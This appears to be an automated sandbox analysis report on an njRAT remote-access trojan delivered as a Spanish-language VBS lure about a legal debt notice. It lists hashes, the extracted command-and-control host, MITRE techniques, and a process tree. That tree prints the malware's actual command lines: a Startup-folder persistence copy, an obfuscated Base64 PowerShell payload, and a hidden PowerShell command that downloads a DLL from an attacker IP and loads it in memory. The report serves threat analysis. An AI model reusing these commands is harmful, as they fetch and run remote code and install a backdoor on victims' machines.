njrat | fffd645e0ed3e653627764842ea17cb464bae80ef48ddb3dbe54d1eddf6b1bb9

Analysis

max time kernel
300s
max time network
304s
platform
windows10_x64
resource
win10-en-20211208
submitted
04-01-2022 17:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs
Size

151KB
MD5

375043101c2b371e5db90b0abdb0379d
SHA1

8ca125b715a2f166ae8d24c87264f9beb4ddda6b
SHA256

fffd645e0ed3e653627764842ea17cb464bae80ef48ddb3dbe54d1eddf6b1bb9
SHA512

582ad71b82c9fd666a5c26738264aded5d226e1a2417f30e55f4b258c3c111caf18b15dcf9d0ffb48c1fa96a996a845cd9e64357925b0f29939252085d6ff416

Score

10^/10

njrat nyan cat suricata trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.241.19.49/ramdes/DownloaderF3.txt

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

revg.duckdns.org:57831

Mutex

ebef4abe57d24e8

Attributes

reg_key
ebef4abe57d24e8
splitter
@!#&^%$

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

22 3096 powershell.exe

flow	pid	process
22	3096	powershell.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RRQ.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RRQ.vbs	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3096 set thread context of 1544 3096 powershell.exe RegSvcs.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3076 PING.EXE

description	pid	process	target process
PID 3096 set thread context of 1544	3096	powershell.exe	RegSvcs.exe

pid	process
3076	PING.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	process
3976	powershell.exe
3976	powershell.exe
3976	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
3096	powershell.exe
3096	powershell.exe
3096	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

RegSvcs.exe

pid process

1544 RegSvcs.exe

pid	process
1544	RegSvcs.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegSvcs.exe

description	pid	process
Token: SeDebugPrivilege	3976	powershell.exe
Token: SeDebugPrivilege	4456	powershell.exe
Token: SeDebugPrivilege	3096	powershell.exe
Token: SeDebugPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe
Token: 33	1544	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1544	RegSvcs.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

WScript.execmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 3380 wrote to memory of 3752	3380	WScript.exe	cmd.exe
PID 3380 wrote to memory of 3752	3380	WScript.exe	cmd.exe
PID 3752 wrote to memory of 3076	3752	cmd.exe	PING.EXE
PID 3752 wrote to memory of 3076	3752	cmd.exe	PING.EXE
PID 3752 wrote to memory of 3976	3752	cmd.exe	powershell.exe
PID 3752 wrote to memory of 3976	3752	cmd.exe	powershell.exe
PID 3380 wrote to memory of 4456	3380	WScript.exe	powershell.exe
PID 3380 wrote to memory of 4456	3380	WScript.exe	powershell.exe
PID 4456 wrote to memory of 3096	4456	powershell.exe	powershell.exe
PID 4456 wrote to memory of 3096	4456	powershell.exe	powershell.exe
PID 3096 wrote to memory of 1544	3096	powershell.exe	RegSvcs.exe
PID 3096 wrote to memory of 1544	3096	powershell.exe	RegSvcs.exe
PID 3096 wrote to memory of 1544	3096	powershell.exe	RegSvcs.exe
PID 3096 wrote to memory of 1544	3096	powershell.exe	RegSvcs.exe
PID 3096 wrote to memory of 1544	3096	powershell.exe	RegSvcs.exe
PID 3096 wrote to memory of 1544	3096	powershell.exe	RegSvcs.exe
PID 3096 wrote to memory of 1544	3096	powershell.exe	RegSvcs.exe
PID 3096 wrote to memory of 1544	3096	powershell.exe	RegSvcs.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3380

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RRQ.vbs')
2⤵
- Suspicious use of WriteProcessMemory
PID:3752

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 10
3⤵
- Runs ping.exe
PID:3076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RRQ.vbs')
3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙DQ☙cwBu☙C8☙d☙Bz☙GU☙d☙☙v☙Dk☙N☙☙u☙Dk☙MQ☙u☙DE☙N☙☙y☙C4☙MQ☙5☙C8☙Lw☙6☙H☙☙d☙B0☙Gg☙Jw☙p☙Ck☙';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.4sn/tset/94.91.142.19//:ptth'))"
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3096

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1544

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
c6b0a774fa56e0169ed7bb7b25c114dd

SHA1
bcdba7d4ecfff2180510850e585b44691ea81ba5

SHA256
b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9

SHA512
42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
269f57a12a6488987deb408ba69b46e2

SHA1
636ddfff17659f4c547c0149f934b69d9910b25d

SHA256
b563ea8391e80c1cee60a076396e7befd0957b335a6f73fe0f2e898296c6001b

SHA512
6de4eac4d310f8d52a99ee055ef9a9da61d89eb215edc917e51fdb4af28534732c149d9ab33929f77b2524621948720397c322ce6348ab1ffb159bb6a711409f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
223a05cfe231f69fafc4878b9e804a4c

SHA1
9e90c30a33c8e2ddbb6246c37d567fd36db11223

SHA256
f2e6a9ec22cb8e3af31c8600ab109b76e17386fe8cd41f70ff67af4a91dec221

SHA512
02280c1479baa0a85476c74a6d661ffb9db71fe1c2eb321e42dcfbfcab684210604ba1cf83314d6bfcce04ec0c4d1e20e17a487dc6373c7e63b60f6eddb09499

Download Submit
memory/1544-185-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1544-180-0x000000000040676E-mapping.dmp

Download
memory/1544-184-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1544-192-0x0000000005620000-0x0000000005686000-memory.dmp

Filesize
408KB

Download
memory/1544-187-0x0000000005200000-0x000000000529C000-memory.dmp

Filesize
624KB

Download
memory/1544-179-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1544-188-0x00000000057A0000-0x0000000005C9E000-memory.dmp

Filesize
5.0MB

Download
memory/1544-189-0x0000000005400000-0x0000000005492000-memory.dmp

Filesize
584KB

Download
memory/1544-190-0x0000000005160000-0x00000000051FC000-memory.dmp

Filesize
624KB

Download
memory/1544-191-0x00000000053A0000-0x00000000053AA000-memory.dmp

Filesize
40KB

Download
memory/3076-116-0x0000000000000000-mapping.dmp

Download
memory/3096-156-0x000001C9B8240000-0x000001C9B8242000-memory.dmp

Filesize
8KB

Download
memory/3096-162-0x000001C9B8240000-0x000001C9B8242000-memory.dmp

Filesize
8KB

Download
memory/3096-177-0x000001C9D4450000-0x000001C9D445C000-memory.dmp

Filesize
48KB

Download
memory/3096-174-0x000001C9D2140000-0x000001C9D2142000-memory.dmp

Filesize
8KB

Download
memory/3096-175-0x000001C9D2143000-0x000001C9D2145000-memory.dmp

Filesize
8KB

Download
memory/3096-173-0x000001C9B8240000-0x000001C9B8242000-memory.dmp

Filesize
8KB

Download
memory/3096-167-0x000001C9B8240000-0x000001C9B8242000-memory.dmp

Filesize
8KB

Download
memory/3096-166-0x000001C9D44D0000-0x000001C9D4546000-memory.dmp

Filesize
472KB

Download
memory/3096-164-0x000001C9B8240000-0x000001C9B8242000-memory.dmp

Filesize
8KB

Download
memory/3096-165-0x000001C9B8240000-0x000001C9B8242000-memory.dmp

Filesize
8KB

Download
memory/3096-163-0x000001C9B8240000-0x000001C9B8242000-memory.dmp

Filesize
8KB

Download
memory/3096-153-0x0000000000000000-mapping.dmp

Download
memory/3096-160-0x000001C9B8240000-0x000001C9B8242000-memory.dmp

Filesize
8KB

Download
memory/3096-159-0x000001C9D4120000-0x000001C9D4142000-memory.dmp

Filesize
136KB

Download
memory/3096-181-0x000001C9B8240000-0x000001C9B8242000-memory.dmp

Filesize
8KB

Download
memory/3096-158-0x000001C9B8240000-0x000001C9B8242000-memory.dmp

Filesize
8KB

Download
memory/3096-157-0x000001C9B8240000-0x000001C9B8242000-memory.dmp

Filesize
8KB

Download
memory/3096-176-0x000001C9D2146000-0x000001C9D2148000-memory.dmp

Filesize
8KB

Download
memory/3096-155-0x000001C9B8240000-0x000001C9B8242000-memory.dmp

Filesize
8KB

Download
memory/3096-154-0x000001C9B8240000-0x000001C9B8242000-memory.dmp

Filesize
8KB

Download
memory/3096-178-0x000001C9D4460000-0x000001C9D447C000-memory.dmp

Filesize
112KB

Download
memory/3752-115-0x0000000000000000-mapping.dmp

Download
memory/3976-122-0x000001EC01BA0000-0x000001EC01BA2000-memory.dmp

Filesize
8KB

Download
memory/3976-117-0x0000000000000000-mapping.dmp

Download
memory/3976-148-0x000001EC01D86000-0x000001EC01D88000-memory.dmp

Filesize
8KB

Download
memory/3976-147-0x000001EC01D83000-0x000001EC01D85000-memory.dmp

Filesize
8KB

Download
memory/3976-146-0x000001EC01D80000-0x000001EC01D82000-memory.dmp

Filesize
8KB

Download
memory/3976-119-0x000001EC01BA0000-0x000001EC01BA2000-memory.dmp

Filesize
8KB

Download
memory/3976-118-0x000001EC01BA0000-0x000001EC01BA2000-memory.dmp

Filesize
8KB

Download
memory/3976-120-0x000001EC01BA0000-0x000001EC01BA2000-memory.dmp

Filesize
8KB

Download
memory/3976-121-0x000001EC01BA0000-0x000001EC01BA2000-memory.dmp

Filesize
8KB

Download
memory/3976-131-0x000001EC01BA0000-0x000001EC01BA2000-memory.dmp

Filesize
8KB

Download
memory/3976-123-0x000001EC1BF70000-0x000001EC1BF92000-memory.dmp

Filesize
136KB

Download
memory/3976-124-0x000001EC01BA0000-0x000001EC01BA2000-memory.dmp

Filesize
8KB

Download
memory/3976-126-0x000001EC01BA0000-0x000001EC01BA2000-memory.dmp

Filesize
8KB

Download
memory/3976-125-0x000001EC01BA0000-0x000001EC01BA2000-memory.dmp

Filesize
8KB

Download
memory/3976-127-0x000001EC01BA0000-0x000001EC01BA2000-memory.dmp

Filesize
8KB

Download
memory/3976-128-0x000001EC1C120000-0x000001EC1C196000-memory.dmp

Filesize
472KB

Download
memory/3976-129-0x000001EC01BA0000-0x000001EC01BA2000-memory.dmp

Filesize
8KB

Download
memory/4456-132-0x0000000000000000-mapping.dmp

Download
memory/4456-151-0x000002512F3B0000-0x000002512F3B2000-memory.dmp

Filesize
8KB

Download
memory/4456-150-0x000002512F3D3000-0x000002512F3D5000-memory.dmp

Filesize
8KB

Download
memory/4456-149-0x000002512F3D0000-0x000002512F3D2000-memory.dmp

Filesize
8KB

Download
memory/4456-145-0x000002514B490000-0x000002514B506000-memory.dmp

Filesize
472KB

Download
memory/4456-144-0x000002512F3B0000-0x000002512F3B2000-memory.dmp

Filesize
8KB

Download
memory/4456-143-0x000002512F3B0000-0x000002512F3B2000-memory.dmp

Filesize
8KB

Download
memory/4456-183-0x000002512F3B0000-0x000002512F3B2000-memory.dmp

Filesize
8KB

Download
memory/4456-142-0x000002512F3B0000-0x000002512F3B2000-memory.dmp

Filesize
8KB

Download
memory/4456-141-0x000002512F3B0000-0x000002512F3B2000-memory.dmp

Filesize
8KB

Download
memory/4456-186-0x000002512F3D6000-0x000002512F3D8000-memory.dmp

Filesize
8KB

Download
memory/4456-140-0x00000251312E0000-0x0000025131302000-memory.dmp

Filesize
136KB

Download
memory/4456-138-0x000002512F3B0000-0x000002512F3B2000-memory.dmp

Filesize
8KB

Download
memory/4456-137-0x000002512F3B0000-0x000002512F3B2000-memory.dmp

Filesize
8KB

Download
memory/4456-136-0x000002512F3B0000-0x000002512F3B2000-memory.dmp

Filesize
8KB

Download
memory/4456-135-0x000002512F3B0000-0x000002512F3B2000-memory.dmp

Filesize
8KB

Download
memory/4456-134-0x000002512F3B0000-0x000002512F3B2000-memory.dmp

Filesize
8KB

Download